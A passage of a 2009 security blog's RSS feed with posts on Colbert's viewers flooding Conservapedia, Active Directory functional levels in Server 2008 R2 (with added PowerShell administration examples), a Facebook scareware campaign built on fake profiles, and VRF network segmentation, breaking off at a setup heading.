		<guid isPermaLink="false">http://praetorianprefect.com/?p=857</guid>
<description><![CDATA[Stephen Colbert launched an impromptu human distributed denial of service (DDOS) by instructing his viewers, or the Colbert Nation, to make edits to the collaborative wiki encyclopedia Conservapedia. Specifically he wants to be added as a character in the Conservapedia translated version of the bible, an ongoing crowd sourcing project of the web site. [...]]]></description>
<content:encoded><![CDATA[<p><a href="http://praetorianprefect.com/wp-content/uploads/2009/10/stephencolbert.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2009/10/stephencolbert-150x150.jpg" alt="stephencolbert" title="stephencolbert" width="150" height="150" class="alignleft size-thumbnail wp-image-863" /></a>Stephen Colbert launched an impromptu human distributed denial of service (DDOS) by instructing his viewers, the Colbert Nation, to make edits to the collaborative wiki encyclopedia <a href="http://www.conservapedia.com">Conservapedia</a>. Specifically, he wants to be added as a character in Conservapedia&#8217;s translated version of the Bible, an ongoing crowdsourcing project of the web site.</p>

<blockquote>
  <p>“…I want you to go to Conservapedia and make me a Biblical figure…”</p>
  
  <p>Stephen Colbert</p>
</blockquote>

<p>According to Conservapedia, liberal bias has become a distortion in modern Bible translations including lack of precision in language both original and modern as well as translation bias. Thus the project seeks to provide a fully &#8220;conservative translation&#8221; of the Bible. The project seeks to identify liberal terms in the bible and replace them, identify where liberal terms for vices have been improperly omitted, identify conservative terms improperly omitted, and replace words that have lost their meaning.</p>

<p>You can read all about it here: <a href="http://conservapedia.com/Conservative_Bible_Project">Conservative Bible Project</a></p>

<div id="attachment_867" class="wp-caption alignleft" style="width: 310px"><a href="http://praetorianprefect.com/wp-content/uploads/2009/10/conservapedia1.gif"><img src="http://praetorianprefect.com/wp-content/uploads/2009/10/conservapedia1-300x158.gif" alt="Conservapedia Bible Project" title="conservapedia" width="300" height="158" class="size-medium wp-image-867" /></a><p class="wp-caption-text">Conservapedia Bible Project</p></div>

<p>Conservapedia itself is a project written from an American-centric and conservative Christian point of view, specifically a young-earth creationist one (literal interpretation of Biblical texts). It was started by Andy Schlafly, a lawyer and social studies teacher who is the son of the conservative activist and constitutional attorney Phyllis Schlafly. The project was initiated as a response to his perception that Wikipedia had become liberal, anti-Christian, and anti-American.</p>

<p>Apparently the &#8220;Colbert Bump&#8221; takes the form of a denial of service for web sites, as the site has been consistently inaccessible from when Colbert made his request and for hours following.</p>

<h3>Update</h3>

<p>Colbert has been integrated into the Book of Genesis:</p>

<div id="attachment_1338" class="wp-caption alignnone" style="width: 310px"><a href="http://praetorianprefect.com/wp-content/uploads/2009/10/colbertasgod1.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2009/10/colbertasgod1-300x225.jpg" alt="In the beginning, Stephen Colbert created..." title="colbertasgod" width="300" height="225" class="size-medium wp-image-1338" /></a><p class="wp-caption-text">In the beginning, Stephen Colbert created...</p></div>

]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2009/10/colberts-human-ddos/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Server 2008 R2: Active Directory Functional Levels</title>
		<link>http://praetorianprefect.com/archives/2009/10/server-2008-r2-active-directory-functional-levels/</link>
		<comments>http://praetorianprefect.com/archives/2009/10/server-2008-r2-active-directory-functional-levels/#comments</comments>
		<pubDate>Tue, 06 Oct 2009 09:12:14 +0000</pubDate>
		<dc:creator>Simon Price</dc:creator>
				<category><![CDATA[Administration]]></category>
		<category><![CDATA[Networking]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[windows]]></category>
		<category><![CDATA[active directory]]></category>
		<category><![CDATA[federation services]]></category>
		<category><![CDATA[kerberos]]></category>
		<category><![CDATA[ldap]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[powershell]]></category>
		<category><![CDATA[server]]></category>
		<category><![CDATA[windows 2008]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=758</guid>
		<description><![CDATA[Windows Server 2008 R2 was released in August, and it introduced new functional levels for Active Directory. This article takes a look back at the different functional levels of the past and what is new in the latest release of the server operating system for Active Directory (yes, a recycle bin for AD objects!).

Functional levels [...]]]></description>
			<content:encoded><![CDATA[<p>Windows Server 2008 R2 was released in August, and it introduced new functional levels for Active Directory. This article takes a look back at the different functional levels of the past and what is new in the latest release of the server operating system for Active Directory (yes, a recycle bin for AD objects!).</p>

<p>Functional levels were first introduced when Active Directory made its appearance in Windows 2000 Server. They allowed you to run different versions of domain controllers in your environment, and when all the domain controllers were brought up to a certain version of Windows, you could raise the functional levels to gain the added features of that operating system version. Now that Windows 2008 R2 is released, it is unlikely that you will mass deploy this new operating system to your entire forest or domain. Instead, you&#8217;ll deploy a single domain controller and kick the tires, so to speak. The time will eventually come when you&#8217;ve upgraded every domain controller to R2, and at that point you can raise the functional level to 2008 R2 to take advantage of the new features.</p>

<p>Functional levels can be raised in domains or, as of Windows 2003 Server, in the forest, providing different features in each. They are differentiated by labeling them Domain Functional Level and Forest Functional Level.</p>

<h3>What&#8217;s new in 2008 R2</h3>

<h4><u>Domain Functional Level</u></h4>

<p>There are two features added when raising the domain functional level to 2008 R2. They are Authentication Mechanism Assurance and Automatic SPN Management.</p>

<p><strong>Authentication mechanism assurance</strong> is meant for domains that use federation services (ADFS) or certificate-based authentication methods, such as smart card or token-based authentication. It adds information about the type of authentication used to the user&#8217;s Kerberos token, which allows administrators to vary group membership based on how the user authenticated. For example, a user can have access to different resources when logging in with a certificate than when logging in with just a username and password.</p>

<p><strong>Automatic SPN management</strong> provides a method for managing service accounts for applications such as Exchange, SQL Server and IIS. In the past, regular domain accounts were used for these purposes, adding management headaches in terms of password management and service principal names (SPNs). This new feature provides the following benefits:</p>

<ul>
<li>A class of domain accounts can be used to manage and maintain services on local computers.</li>
<li>Passwords for these accounts will be reset automatically.</li>
<li>Administrators do not have to perform complex SPN management tasks to use managed service accounts.</li>
<li>Administrative tasks for managed service accounts can be delegated to non-administrators.</li>
</ul>
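<p>As an added illustration (not code from the article, nor Microsoft&#8217;s own documentation), the following PowerShell creates one such account end to end. It assumes the Active Directory module for Windows PowerShell, a domain already at the 2008 R2 domain functional level, and the hypothetical names <code>WEB01</code> for the IIS member server and <code>svc-web01</code> for the account. Before registering the SPN it checks that no other object already holds it, because two accounts carrying the same SPN break Kerberos authentication for the service.</p>

```powershell
# Added example, not code from the article. Assumes the Active Directory module for
# Windows PowerShell, a domain already at the 2008 R2 domain functional level, and the
# hypothetical names WEB01 (the IIS member server) and svc-web01 (the service account).
Import-Module ActiveDirectory

$hostName = 'WEB01'         # assumption: the member server that will run the service
$msaName  = 'svc-web01'     # assumption: keep MSA names to 15 characters or fewer
$domain   = Get-ADDomain
$spn      = "HTTP/$hostName.$($domain.DNSRoot)"

# 1. MSAs need the 2008 R2 domain level; stop early rather than fail half-way through.
if ($domain.DomainMode -ne 'Windows2008R2Domain') {
    throw "Domain functional level is $($domain.DomainMode); Windows2008R2Domain is required."
}

# 2. Two accounts holding the same SPN break Kerberos for both, so look for an existing
#    owner before registering it. The search covers any object class, not just users.
$owner = Get-ADObject -LDAPFilter "(servicePrincipalName=$spn)"
if ($owner) {
    throw "SPN $spn is already registered on $($owner.DistinguishedName)"
}

# 3. Create the account. No password is supplied: the domain generates one and rotates it
#    automatically, so there is nothing to store in a vault or type into a service dialog.
New-ADServiceAccount -Name $msaName -Enabled $true

# 4. Bind it to the one computer allowed to retrieve its password, and put the SPN on the
#    account itself instead of maintaining it by hand with setspn.exe.
Add-ADComputerServiceAccount -Identity $hostName -ServiceAccount $msaName
Set-ADServiceAccount -Identity $msaName -ServicePrincipalNames @{ Add = $spn }

# 5. On WEB01 itself (not on the domain controller) run:
#      Install-ADServiceAccount -Identity svc-web01
#    and configure the service to log on as MYDOMAIN\svc-web01$ with an empty password.

# Verify from the directory which host may use the account and which SPNs it carries.
Get-ADServiceAccount -Identity $msaName -Properties HostComputers, ServicePrincipalNames |
    Select-Object Name, HostComputers, ServicePrincipalNames
```

<p>The duplicate-SPN check is the step most often skipped when service accounts are created by hand; with a managed service account the password problem goes away, but SPN collisions still have to be caught by whoever creates the account.</p>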

<h4><u>Forest Functional Level</u></h4>

<p>There is one new feature gained by raising the forest functional level to Server 2008 R2, and it is long overdue: the Active Directory Recycle Bin. In the days of old, when an IT administrator or help desk operator accidentally deleted an OU full of user or computer objects (this has happened more times than you would think), there would be a scramble to perform a restore. The deletion replicates to all domain controllers, so an authoritative restore from a good backup, performed with NTDSutil in Directory Services Restore Mode, would be in order. At the 2008 R2 forest functional level, a PowerShell cmdlet undoes the deletion instantly.</p>

<p>Note that this feature is not enabled automatically when you raise the forest functional level; you must also run the following command in the Active Directory Module for Windows PowerShell.</p>

<pre><code>Enable-ADOptionalFeature -Identity 'CN=Recycle Bin Feature,CN=Optional Features,CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration,DC=mydomain,DC=com' `
    -Scope ForestOrConfigurationSet -Target 'mydomain.com'
</code></pre>
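<p>Putting the pieces together, here is an added PowerShell walkthrough (not from the article) that checks every domain controller before raising the levels, enables the recycle bin with the feature DN built from the forest&#8217;s configuration partition, and then recovers a deleted OU together with its contents. It assumes the Active Directory module, a single-domain forest named <code>mydomain.com</code> as in the command above, and a hypothetical OU named <code>Sales</code>.</p>

```powershell
# Added example, not code from the article. Assumes the Active Directory module for
# Windows PowerShell, a single-domain forest named mydomain.com (as in the article's
# command) and a hypothetical OU named "Sales" that was deleted by mistake.
Import-Module ActiveDirectory

$forestName = 'mydomain.com'

# 1. Levels can only go up, never back down, and raising requires every DC to run the
#    target OS. List the DCs and refuse to continue if any is older than 2008 R2.
$dcs = Get-ADDomainController -Filter *
$dcs | Select-Object HostName, OperatingSystem, OperatingSystemVersion | Format-Table -AutoSize
$older = $dcs | Where-Object { $_.OperatingSystem -notlike '*2008 R2*' }
if ($older) {
    $names = ($older | ForEach-Object { $_.HostName }) -join ', '
    throw "Cannot raise functional levels; pre-2008 R2 domain controllers: $names"
}

# 2. Domain level first: the forest level requires every domain to already be there.
Set-ADDomainMode -Identity $forestName -DomainMode Windows2008R2Domain -Confirm:$false
Set-ADForestMode -Identity $forestName -ForestMode Windows2008R2Forest -Confirm:$false

# 3. Enable the recycle bin. The feature DN is built from the configuration partition so
#    the long string is not typed by hand; enabling it is irreversible as well.
$configNC  = (Get-ADRootDSE).configurationNamingContext
$featureDN = "CN=Recycle Bin Feature,CN=Optional Features,CN=Directory Service,CN=Windows NT,CN=Services,$configNC"
Enable-ADOptionalFeature -Identity $featureDN -Scope ForestOrConfigurationSet -Target $forestName -Confirm:$false

# Verify: EnabledScopes lists the partitions the feature now covers.
Get-ADOptionalFeature -Filter { Name -eq 'Recycle Bin Feature' } | Select-Object Name, EnabledScopes

# 4. Recover a deleted OU and everything that was in it. Only objects deleted after the
#    feature was enabled are recoverable this way; earlier deletions are plain tombstones.
$deletedOU = Get-ADObject -Filter { isDeleted -eq $true -and objectClass -eq 'organizationalUnit' -and Name -like 'Sales*' } `
    -IncludeDeletedObjects -Properties whenChanged |
    Sort-Object whenChanged -Descending | Select-Object -First 1

if ($deletedOU) {
    # The container has to come back before its former children can be restored into it.
    Restore-ADObject -Identity $deletedOU.ObjectGUID
    $restoredDN = (Get-ADObject -Identity $deletedOU.ObjectGUID).DistinguishedName

    # lastKnownParent is a DN-syntax attribute, so it now resolves to the restored OU.
    Get-ADObject -Filter { isDeleted -eq $true -and lastKnownParent -eq $restoredDN } -IncludeDeletedObjects |
        Restore-ADObject
}
```

<p>The order in step 4 matters: children are restored into the location recorded in <code>lastKnownParent</code>, so restoring a child before its container fails. Restoring the most recently deleted OU of that name avoids picking up an older deletion with the same name.</p>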

<h4>Functional levels of previous versions</h4>

<p>The following are the previous functional levels and what features they added, as documented in <a href="http://technet.microsoft.com/en-us/library/cc771132(WS.10).aspx">Technet</a>.</p>

<hr />

<h3>Domain Functional Levels:</h3>

<h4>Windows 2000 Native:</h4>

<ul>
<li>Universal groups are enabled for both distribution groups and security groups.</li>
<li>Group nesting.</li>
<li>Group conversion is enabled, which makes conversion between security groups and distribution groups possible.</li>
<li>Security identifier (SID) history.</li>
</ul>

<h4>Windows Server 2003</h4>

<ul>
<li>The availability of the domain management tool, <code>Netdom.exe</code>, to prepare for domain controller rename.</li>
<li>Update of the logon time stamp. The <code>lastLogonTimestamp</code> attribute will be updated with the last logon time of the user or computer. This attribute is replicated within the domain.</li>
<li>The ability to set the <code>userPassword</code> attribute as the effective password on <code>inetOrgPerson</code> and user objects.</li>
<li>The ability to redirect the Users and Computers containers. By default, two well-known containers are provided for housing computer and user/group accounts, namely <code>cn=Computers</code> and <code>cn=Users</code>. This feature makes it possible to define a new well-known location for these accounts.</li>
<li>Makes it possible for Authorization Manager to store its authorization policies in Active Directory Domain Services (AD DS).</li>
<li>Includes constrained delegation so that applications can take advantage of the secure delegation of user credentials by means of the Kerberos authentication protocol. Delegation can be configured to be allowed only to specific destination services.</li>
<li>Supports selective authentication, through which it is possible to specify the users and groups from a trusted forest who are allowed to authenticate to resource servers in a trusting forest.</li>
</ul>

<h4>Windows Server 2008</h4>

<ul>
<li>Distributed File System (DFS) Replication support for SYSVOL, which provides more robust and detailed replication of SYSVOL contents.</li>
<li>Advanced Encryption Standard (AES 128 and 256) support for the Kerberos authentication protocol.</li>
<li>Last Interactive Logon Information, which displays the time of the last successful interactive logon for a user, from what workstation, and the number of failed logon attempts since the last logon.</li>
<li>Fine-grained password policies (FGPP), which make it possible for password and account lockout policies to be specified for users and global security groups in a domain.</li>
</ul>

<h3>Forest Functional Levels:</h3>

<h4>Windows 2000:</h4>

<p>There were no forest functional levels in Windows 2000, just domain functional levels.</p>

<h4>Windows Server 2003:</h4>

<ul>
<li>Forest trust.</li>
<li>Domain rename.</li>
<li>Linked-value replication (changes in group membership store and replicate values for individual members instead of replicating the entire membership as a single unit). This change results in lower network bandwidth and processor usage during replication and eliminates the possibility of lost updates when different members are added or removed concurrently at different domain controllers.</li>
<li>The ability to deploy a read-only domain controller (RODC) that runs Windows Server 2008.</li>
<li>Improved Knowledge Consistency Checker (KCC) algorithms and scalability. The Intersite Topology Generator (ISTG) uses improved algorithms that scale to support forests with a greater number of sites than can be supported at the Windows 2000 forest functional level. The improved ISTG election algorithm is a less intrusive mechanism for choosing the ISTG at the Windows 2000 forest functional level.</li>
<li>An improved ISTG algorithm (better scaling of the algorithm that the ISTG uses to connect all sites in the forest).</li>
<li>The ability to create instances of the dynamic auxiliary class called dynamicObject in a domain directory partition.</li>
<li>The ability to convert an <code>inetOrgPerson</code> object instance into a User object instance, and the reverse.</li>
<li>The ability to create instances of the new group types, called application basic groups and Lightweight Directory Access Protocol (LDAP) query groups, to support role-based authorization.</li>
<li>Deactivation and redefinition of attributes and classes in the schema.</li>
</ul>

<h4>Windows Server 2008:</h4>

<p>No forest functional level changes occurred from Windows 2003 to Windows 2008.</p>

<p><strong>Related Posts:</strong></p>
<ul>
<li><a href="http://praetorianprefect.com/archives/2010/06/iphone-4-ordering-and-session-switching/">iPhone 4 Ordering and Session Switching</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/05/mays-patch-tuesday/">May&#8217;s Patch Tuesday</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/03/3473/">March&#8217;s Patch Tuesday</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/03/press-f1-for-help-pwned/">Press F1 for Help, pwned.</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/01/disable-acrobat-reader-pdf-in-the-enterprise/">Using Group Policy to Disable JavaScript in Adobe PDF Files</a></li>
</ul><br />
]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2009/10/server-2008-r2-active-directory-functional-levels/feed/</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>Facebook’s Faith: A New Scareware Attack</title>
		<link>http://praetorianprefect.com/archives/2009/10/facebook%e2%80%99s-faith-a-new-scareware-attack/</link>
		<comments>http://praetorianprefect.com/archives/2009/10/facebook%e2%80%99s-faith-a-new-scareware-attack/#comments</comments>
		<pubDate>Thu, 01 Oct 2009 21:22:43 +0000</pubDate>
		<dc:creator>Prefect</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Social Networking]]></category>
		<category><![CDATA[capthca]]></category>
		<category><![CDATA[facebook]]></category>
		<category><![CDATA[non-technical]]></category>
		<category><![CDATA[scareware]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=684</guid>
		<description><![CDATA[On Thursday morning, AVG researcher Roger Thompson, after sourcing some spyware attacks to a series of Facebook profiles, noted that these few hundred profiles were showing up with the same profile image (seen at left) but different profile information.  The home video link on these profiles, belonging to Faith / Emily / whoever, points to a web site that displays scareware dialogs.]]></description>
			<content:encoded><![CDATA[<div id="attachment_685" class="wp-caption alignleft" style="width: 196px"><a href="http://praetorianprefect.com/wp-content/uploads/2009/10/faith.jpg"><img class="size-full wp-image-685" title="faith" src="http://praetorianprefect.com/wp-content/uploads/2009/10/faith.jpg" alt="Meet Faith...or Emily...or...the face of the new Facebook attack" width="186" height="247" /></a><p class="wp-caption-text">Meet Faith...or Emily...or...the face of the new Facebook attack</p></div>

<p>On Thursday morning, AVG researcher Roger Thompson, after sourcing some spyware attacks to a series of Facebook profiles, noted that these few hundred profiles were showing up with the same profile image (seen at left) but different profile information. The home video link on these profiles, belonging to Faith / Emily / whoever, points to a web site that displays scareware dialogs: <em>netmedtest.com/index.php?affid=30500</em>.</p>

<p>Clicking the video URL opens a browser dialog box claiming the user has viruses on their PC, offers a &#8220;system check&#8221;, and then displays the scareware dialog. Scareware is software that is sold or pushed for download by creating the perception of a threat to the user (usually a non-existent one); the software itself is typically non-functional or malicious.</p>

<p>The domain itself is registered to accounts with temporary or throwaway e-mail addresses. Amusingly, services like spambob and mailinator that were intended to help users avoid spam are used by bad actors as the registration and contact e-mail addresses for malicious web site URLs. The site <em>netmedtest</em> is hosted in Haifa, Israel.</p>

<h3>The Profile</h3>

<div id="attachment_690" class="wp-caption alignnone" style="width: 723px"><a href="http://praetorianprefect.com/wp-content/uploads/2009/10/facebookattack_screen1.jpg"><img class="size-full wp-image-690" title="facebookattack_screen1" src="http://praetorianprefect.com/wp-content/uploads/2009/10/facebookattack_screen1.jpg" alt="The fake profile with video link." width="713" height="370" /></a><p class="wp-caption-text">The fake profile with video link.</p></div>

<div id="attachment_698" class="wp-caption alignnone" style="width: 279px"><a href="http://praetorianprefect.com/wp-content/uploads/2009/10/facebookattack_screen2.jpg"><img class="size-full wp-image-698" title="facebookattack_screen2" src="http://praetorianprefect.com/wp-content/uploads/2009/10/facebookattack_screen2.jpg" alt="If you click the video link, you get this dialog." width="269" height="100" /></a><p class="wp-caption-text">If you click the video link, you get this dialog.</p></div>

<div id="attachment_699" class="wp-caption alignnone" style="width: 549px"><a href="http://praetorianprefect.com/wp-content/uploads/2009/10/facebookattack_screen3.jpg"><img class="size-full wp-image-699" title="facebookattack_screen3" src="http://praetorianprefect.com/wp-content/uploads/2009/10/facebookattack_screen3.jpg" alt="And after that, you get this dialog." width="539" height="289" /></a><p class="wp-caption-text">And after that, you get this dialog.</p></div>

<h3>Facebook&#8217;s Response</h3>

<p>Facebook spokesman Simon Axten notes that Facebook is in the process of identifying the fake accounts so they can be disabled en masse. The actual URL used to serve the spyware has been blocked by Facebook as well as the major web browsers already.</p>

<h3>A Failure of CAPTCHA</h3>

<p>The fact that there are a couple of hundred of these profile pages could suggest an automated setup of the accounts, which would mean a bypass of the CAPTCHA authentication used in account setup on Facebook. Facebook uses <a href="http://recaptcha.net/learnmore.html">reCAPTCHA</a> specifically (a free service that is digitizing the NY Times at the same time they are validating that the user is actually human).</p>

<div id="attachment_701" class="wp-caption alignleft" style="width: 463px"><a href="http://praetorianprefect.com/wp-content/uploads/2009/10/facebook_captcha_example.jpg"><img class="size-full wp-image-701" title="facebook_captcha_example" src="http://praetorianprefect.com/wp-content/uploads/2009/10/facebook_captcha_example.jpg" alt="Facebook CAPTCHA screen example." width="453" height="249" /></a><p class="wp-caption-text">Facebook CAPTCHA screen example.</p></div>

<p>CAPTCHA mechanisms have increasingly been compromised by both automated programmatic means such as the <a href="http://securitylabs.websense.com/content/Blogs/2919.aspx">method used to break Google’s CAPTCHA</a>, as well as through manual means where human interaction is used to solve CAPTCHA images (cheap sources of labor spend the day typing in CAPTCHA responses). Given that the fake profiles number in the hundreds, either method is realistically plausible. Facebook&#8217;s spokesperson indicates that they believe it is the second case: &#8220;Based on our investigation and the relatively small number of accounts created, we’re almost certain that they were created manually, rather than by a bot.&#8221;</p>

<p>At the time of writing this example bogus profile of Faith Price is still available on Facebook: <a href="http://www.facebook.com/people/Faith-Price/100000305282922">http://www.facebook.com/people/Faith-Price/100000305282922</a>.</p>

<h3>Countermeasures</h3>

<p>As previously stated, the major browsers have picked up the malicious link and are blocking it, and Facebook is aware of the problem, so for most users this is not a major issue at this point. As always, legitimate anti-virus companies will not advertise to you using scareware tactics, so avoid clicking on links provided by people you do not know. In general, limit the damage of drive-by downloads by not browsing the web with a user account that has administrative privileges.</p>

<h3>References</h3>

<ul>
<li><a href="http://thompson.blog.avg.com/">AVG Blogs &#8211; Roger Thompson</a></li>
<li><a href="http://recaptcha.net/learnmore.html">What is ReCAPTCHA?</a></li>
<li><a href="http://www.computerworld.com/s/article/9138780/Facebook_Captchas_broken_">Facebook Captchas broken?</a></li>
</ul>

<p><strong>Related Posts:</strong></p>
<ul>
<li><a href="http://praetorianprefect.com/archives/2010/06/persistent-xss-on-twitter-com/">Persistent XSS on Twitter.com</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/06/iphone-4-ordering-and-session-switching/">iPhone 4 Ordering and Session Switching</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/05/mays-patch-tuesday/">May&#8217;s Patch Tuesday</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/03/3473/">March&#8217;s Patch Tuesday</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/03/press-f1-for-help-pwned/">Press F1 for Help, pwned.</a></li>
</ul><br />
]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2009/10/facebook%e2%80%99s-faith-a-new-scareware-attack/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>VRF is the new Black: How I Learned to Stop Worrying and Love the Complexity</title>
		<link>http://praetorianprefect.com/archives/2009/09/vrf-is-the-new-black-how-i-learned-to-stop-worrying-and-love-the-complexity/</link>
		<comments>http://praetorianprefect.com/archives/2009/09/vrf-is-the-new-black-how-i-learned-to-stop-worrying-and-love-the-complexity/#comments</comments>
		<pubDate>Tue, 29 Sep 2009 22:12:53 +0000</pubDate>
		<dc:creator>Jeremy Rossi</dc:creator>
				<category><![CDATA[Featured]]></category>
		<category><![CDATA[Networking]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Cisco]]></category>
		<category><![CDATA[ios]]></category>
		<category><![CDATA[Juniper]]></category>
		<category><![CDATA[screenos]]></category>
		<category><![CDATA[vpn]]></category>
		<category><![CDATA[vrf]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=612</guid>
		<description><![CDATA[Breaking up your network &#8220;is good,&#8221; we all know this, and VLANs have traditionally been used to segment a network to help with maintenance, management, and security; but, they are not the only game in town and often the wrong place to break your network into smaller and more efficient pieces.  VPN Routing and [...]]]></description>
			<content:encoded><![CDATA[<p>Breaking up your network <em>&#8220;is good,&#8221;</em> we all know this, and VLANs have traditionally been used to segment a network to help with maintenance, management, and security; but, they are not the only game in town and often the wrong place to break your network into smaller and more efficient pieces.  VPN Routing and Forwarding (VRF) can do the same for layer 3 infrastructure that VLANs do for layer 2.  By allowing you to create and manage separate routing tables within a single physical router, they truly bring virtualization and segmentation to all points on your network.  As with any technology that adds layers, complexity can become a problem, but you already know this.</p>

<h2>Table of Contents</h2>

<ul>
<li><a href="#vrf-intro">Virtual Routing and Forwarding (VRF)</a></li>
<li><a href="#vrf-setup">VRF Lite Setup</a>

<ul>
<li><a href="#setup-ios">Cisco IOS</a></li>
<li><a href="#setup-screenos">Juniper ScreenOS</a></li>
<li><a href="#setup-junos">Juniper JunOS</a></li>
</ul></li>
</ul>

<h2 id="vrf-intro">Virtual Routing and Forwarding (VRF)</h2>

<blockquote>
  <p>&#8220;It&#8217;s incredibly obvious, isn&#8217;t it? A foreign substance is introduced into our precious bodily fluids without the knowledge of the individual, and certainly without any choice.&#8221;</p>
  
  <p><code>Gen Jack D. Ripper</code></p>
</blockquote>

<p>Virtual routing and forwarding (VRF) is a technology included in network routers that allows multiple instances of a routing table to exist in a single router all while working simultaneously.</p>

<p>There are two types of VRFs: <em>&#8220;VRF&#8221;</em> and <em>&#8220;VRF Lite.&#8221;</em></p>

<p>VRF Lite is a subset of VRF without the protocols used to build VPNs between routers, namely MPLS. Full VRFs are very common in service provider networks, and at some point nearly all Internet traffic passes through a VRF or two.</p>

<p>VRF Lite allows for interfaces on a physical router to belong to a routing instance.  This routing instance has its own forwarding table, ARP entries, and everything else needed to make a forwarding decision.  It can simply be thought of as a router within a router (<em><a title="Routers in router" rel="lightbox" href="http://praetorianprefect.com/wp-content/uploads/2009/05/router-in-router.png"> Figure 1</a></em>).</p>

<div class="wp-caption" style="float: right;margin: 5px;margin-left: 60px;margin-right: 21px;"><a title="Routers in router" rel="lightbox" href="http://praetorianprefect.com/wp-content/uploads/2009/05/router-in-router.png"><img src="http://praetorianprefect.com/wp-content/uploads/2009/05/router-in-router.png" border="0" alt="router in router.png" width="200" height="135" /></a>
<p class="wp-caption-text">Figure 1: Routers within Router</p>
</div>

<p>This structure makes VRFs useful for many applications and as a solution to quite a few tough network design issues. It can be used to improve the network in the following ways:</p>

<ul>
<li><a href="#vrf-intro-seg">Segmentation</a></li>
<li><a href="#vrf-intro-mgmt">Management and Control</a></li>
<li><a href="#vrf-intro-sec">Security</a></li>
</ul>

<h5 id="vrf-intro-seg">Segmentation</h5>

<p>Layer 2 segmentation based on VLANs and firewalls is showing strains and is being pushed beyond what is reasonable for how a network architecture should be built. A good example of this is 10 Gig and 1 Gig Ethernet MANs<sup id="fnref:1"><a href="#fn:1" rel="footnote">1</a></sup> that span multiple buildings and datacenters into a single campus. An overview of a large campus network can be seen in <a title="Large MAN Overview" rel="lightbox" href="http://praetorianprefect.com/wp-content/uploads/2009/04/man-example.png">Figure 2</a>.</p>

<p>In our example network, creating wired guest access would require either firewalls in each building or extending VLANs between buildings to the centralized firewalls in the datacenter. Both options have downsides that VRFs are better at solving.</p>

<div class="wp-caption" style="float: right;margin: 5px;margin-left: 60px;margin-right: 21px;"><a title="Figure 2: Large MAN Overview" rel="lightbox" href="http://praetorianprefect.com/wp-content/uploads/2009/04/man-example.png"><img src="http://praetorianprefect.com/wp-content/uploads/2009/04/man-example.png" border="1" alt="MAN Network Diagram" width="200" height="204" /> </a>
<p class="wp-caption-text"><a title="Figure 2: Large MAN Overview" rel="lightbox" href="http://praetorianprefect.com/wp-content/uploads/2009/04/man-example.png">Figure 2: Large MAN Overview</a></p>

</div>

<p>Extending VLANs between buildings would make the campus network design rely on Spanning Tree and other layer 2 protocols to provide a loop-free environment. In a network as large as our example, this can lead to long failover times during hardware failure, while also leaving available network bandwidth unused.</p>

<p>Using firewalls avoids most of the utilization and failover problems by allowing a layer 3 routed campus design, but this comes at a large cost: maintenance, and the raw hardware cost of firewalls able to handle 10 Gig and 1 Gig Ethernet line rates. Access lists are often substituted for firewalls to reduce costs, but this approach is fraught with issues, and access lists are never reviewed often enough.</p>

<p>A VRF-based solution for a wired guest network on a large campus would allow guest traffic to be routed to the firewalls in the datacenters via routing policy while still being segmented away from production traffic. By leveraging VRFs, none of the aforementioned compromises are required to keep this separation. The production network is able to fully utilize all available links and does not rely on Spanning Tree between sites for a loop-free environment.</p>

<h5 id="vrf-intro-mgmt">Management and Control</h5>

<p>For managing devices on a network, there is a need for out-of-band (OOB) connections. There really is no other sure-fire way of gaining access during a truly catastrophic event than this tried and true modem/console connection. But for the daily running and maintenance of the network, OOB cannot keep up with the needs of daily maintenance and the amount of traffic generated by NetFlow, logging, ftp/tftp backups, and scp (secure copy) of new images. To complete these high-bandwidth functions, most companies I have seen and worked with just resort to using the same network that server and even desktop traffic utilizes. This traffic in many cases is highly sensitive and really should not be available to anyone outside of authorized users.</p>

<p>VRFs can help to move this traffic out of the primary network and into a second network that only services management functions and has no direct access to the Internet, desktops, or other uncontrolled resources. In fact, Cisco is now adding VRF management ports to some of their newer devices<sup id="fnref:4"><a href="#fn:4" rel="footnote">2</a></sup>. ACLs and other forms of control and logging are still needed, but they become simpler to keep updated and are normally far less complicated when production traffic is neither expected nor allowed.</p>

<h5 id="vrf-intro-sec">Security</h5>

<blockquote>
  <p>&#8220;I&#8230; I don&#8217;t know exactly how to put this, sir, but are you aware of what a serious breach of security that would be?
  I mean, he&#8217;ll see everything, he&#8217;ll&#8230; he&#8217;ll see the Big Board!&#8221;</p>
  
  <p><code>Gen "Buck" Turgidson</code></p>
</blockquote>

<p>VRFs allow for complete separation of different routing instances from one another. This simple and effective concept of hiding networks from each other and limiting the ability of devices to interact outside of defined boundaries creates a more secure network. A good example of this would be a voice network within a campus. In general, there is very little reason for VoIP end points to speak to anything other than the voice gateway and each other. Moving voice traffic to a VRF still allows the gateways to interact, and even allows direct device-to-device interconnection, while greatly reducing the available attack vectors.</p>

<p>VRFs do increase the attack surface of your network devices, because of the increased number of addressable interfaces on each hardware device. But I would counter this with the fact that the network is divided into more domain-specific networks, so the ACLs and protection measures required become much simpler to implement and keep up to date. A good and simple example of this would be to block all management functions for anything outside of the management VRF.</p>

<h2 id="vrf-setup">VRF Lite Setup</h2>

